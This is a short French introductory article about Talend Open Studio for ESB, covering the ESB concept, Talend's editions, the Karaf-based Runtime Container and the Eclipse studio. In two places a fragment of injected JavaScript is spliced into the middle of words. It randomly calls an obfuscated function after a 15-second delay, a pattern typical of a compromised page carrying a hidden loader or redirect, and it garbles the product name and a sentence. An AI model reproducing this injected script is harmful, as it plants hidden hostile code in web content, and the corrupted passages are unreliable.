Découverte de Talend Open Studio for ESB

Découverte de Talend Open Studio for ESB

L’Enterprise Service Bus, ou ESB, est un ensemble de moyens techniques et organisationnels dont le but est de permettre la communication entre des applications qui, à la base, ne sont pas pensées pour fonctionner ensemble.

On peut considérer l’ESB comme une nouvelle génération d’EAI (Enterprise Application Integration). La différence majeure avec l’EAI réside dans le fait que l’ESB propose une architecture distribuée décentralisée grâce à l’orchestration de services. Ceux-ci contiennent la logique d’intégration et peuvent être déposés au plus près des applications sources si nécessaire.

Talend offre 3 éditions pour la mise en place d’un ESB :

  • Talend ESB Standandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ard Edition, framework Open Source basée Apache.
  • Talend Open Studio for ESB, édition Open source avec un environnement de développement.
  • Talend Enterprise ESB, version avec souscription avec fonctions de déploiement et gestion.

Lors de la première prise en main de Talend Open Studio for ESB, on constate qu’il faut démarrer manuellement plusieurs services en ligne de commandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}e afin que la plate-forme soit opérationnelle. Il faut notamment le faire pour le Talend Runtime Container, qui permet de déployer et gérer les jobs et les services Web de manière distante. Ce service OSGi (Open Services Gateway initiative) s’appuie sur Apache Karaf.

Le studio de Talend Open Studio for ESB s’appuie sur le studio de la plateforme unifiée de Talend. Il s’agit donc du même studio, basé sur Eclipse, avec des composants dédiés aux fonctionnalités ESB permettant de gérer la gestion des messages, les services Web, le routage et la transformation des données. Il permet ainsi de développer et de publier des services Web Java, des applications REST et des routes de médiation afin de faire communiquer les applications entre elles.

La première étape consiste à créer un service Web au niveau de l’arborescence du référentiel afin de pouvoir le déployer au niveau du Runtime Container.

 

Découverte de Talend Open Studio for ESB